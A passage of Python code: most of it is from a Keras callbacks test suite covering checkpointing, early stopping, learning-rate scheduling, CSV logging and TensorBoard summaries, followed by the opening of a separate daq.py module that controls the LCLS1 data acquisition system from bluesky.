(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
model.load_weights(filepath)
weights_before_additional_fit = model.get_weights()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
])
model.load_weights(filepath)
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) == 1
assert loss[0] == np.inf
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, dirnames, filenames) in os.walk(self.logdir):
del dirnames # unused
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
if __name__ == '__main__':
test.main()
|
daq.py | """
This module defines a control interface for the LCLS1 DAQ.
"""
import enum
import functools
import logging
import os
import time
import threading
from importlib import import_module
from ophyd.status import Status, wait as status_wait
from . import ext_scripts
from .ami import set_pyami_filter, set_monitor_det
logger = logging.getLogger(__name__)
pydaq = None
# Wait up to this many seconds for daq to be ready for a begin call
BEGIN_TIMEOUT = 2
# Do not allow begins within this many seconds of a stop
BEGIN_THROTTLE = 1
def check_connect(f):
"""
Decorator to ensure that the `Daq` is connected before running a method.
"""
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
logger.debug('Checking for daq connection')
if not self.connected:
msg = 'DAQ is not connected. Attempting to connect...'
logger.info(msg)
self.connect()
if self.connected:
logger.debug('Daq is connected')
return f(self, *args, **kwargs)
else:
err = 'Could not connect to DAQ'
logger.error(err)
raise RuntimeError(err)
return wrapper
class Daq:
"""
The LCLS1 daq as a ``bluesky``-compatible object.
This uses the ``pydaq`` module to connect with a running daq instance,
controlling it via socket commands.
It can be used as a ``Reader`` in a ``bluesky`` plan to take data at
discrete scan points.
It can be used as a ``Flyer`` in a ``bluesky`` plan to have the daq start
at the beginning of the run and end at the end of the run.
Unlike normal ``bluesky`` readable devices or flyers, this has no data to
report to the ``RunEngine`` on the ``read`` or ``collect`` calls. No data
will pass into the python layer from the daq.
Parameters
----------
RE: ``RunEngine``, optional
Set ``RE`` to the session's main ``RunEngine``
"""
_state_enum = enum.Enum('PydaqState',
'Disconnected Connected Configured Open Running',
start=0)
default_config = dict(events=None,
duration=None,
use_l3t=False,
record=False,
controls=None,
begin_sleep=0)
name = 'daq'
parent = None
def __init__(self, RE=None):
if pydaq is None:
globals()['pydaq'] = import_module('pydaq')
super().__init__()
self._control = None
self._config = None
self._desired_config = {}
self._reset_begin()
self._host = os.uname()[1]
self._RE = RE
self._re_cbid = None
self._config_ts = {}
self._update_config_ts()
self._pre_run_state = None
self._last_stop = 0
register_daq(self)
# Convenience properties
@property
def connected(self):
"""
``True`` if the daq is connected, ``False`` otherwise.
"""
return self._control is not None
@property
def configured(self):
"""
``True`` if the daq is configured, ``False`` otherwise.
"""
return self._config is not None
@property
def config(self):
"""
The current configuration, e.g. the last call to `configure`
"""
if self.configured:
return self._config.copy()
else:
return self.default_config.copy()
@property
def next_config(self):
"""
The next queued configuration.
This can be different than `config` if we have queued up a
configuration to be run on the next begin.
"""
cfg = self.config
cfg.update(self._desired_config)
return cfg
@property
def state(self):
"""
State as reported by the daq. Can be any of the following:
- ``Disconnected``: No active session in python
- ``Connected``: Active session in python
- ``Configured``: Connected, and the daq has been configured
- ``Open``: We are in the middle of a run
- ``Running``: We are collecting data in a run
"""
if self.connected:
logger.debug('calling Daq.control.state()')
num = self._control.state()
return self._state_enum(num).name
else:
return 'Disconnected'
# Interactive methods
def connect(self):
"""
Connect to the live DAQ, giving full control to the Python process.
To undo this, you may call `disconnect`.
